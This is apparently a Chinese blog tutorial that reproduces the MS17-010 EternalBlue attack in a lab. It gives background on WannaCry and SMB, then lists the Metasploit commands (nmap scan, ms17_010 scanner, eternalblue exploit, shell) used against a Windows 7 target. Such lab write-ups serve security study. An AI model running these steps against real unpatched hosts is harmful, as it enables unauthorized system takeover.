ms17-010---永恒之蓝

简介:

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议来获取系统的最高权限,以此来控制计算机。

甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

不过在该病毒出来不久就被微软通过打补丁修复。

SMB协议:SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

复现

攻击者:Linux kali2021.2 (192.168.174.130)
靶机:windows 7 enterprise(192.168.174.132)

过程

1、发现主机
nmap 192.168.174.0/24

ms17-010---永恒之蓝_第1张图片

这里可以看到445端口是开放的,而永恒之蓝就是利用这个端口的445端口的SMB服务。

2、使用msf的永恒之蓝模块

打开msf:
ms17-010---永恒之蓝_第2张图片
搜索相关的工具:

search ms17_010

ms17-010---永恒之蓝_第3张图片

3、使用ms_17-010的扫描模块,对靶机进行扫描:

使用模块:

use auxiliary/scanner/smb/smb_ms17_010 

设置目标IP或网段:

set rhosts 192.168.174.132

执行扫描:

run

ms17-010---永恒之蓝_第4张图片

4、使用ms17_010模块,执行

使用模块:

 use exploit/windows/smb/ms17_010_eternalblue

设置攻击IP:

set rhosts 192.168.174.132

这里可以使用show options查看设置选项
ms17-010---永恒之蓝_第5张图片

执行:

exploit 或者 run

ms17-010---永恒之蓝_第6张图片

5、得到shell靶机

输入shell就可以得到shell靶机了
输入:chcp 65001解决乱码问题
到这里就已经成功了,可以通过cmd进行操作了
ms17-010---永恒之蓝_第7张图片

复现完成!

你可能感兴趣的:(网络,安全,web安全)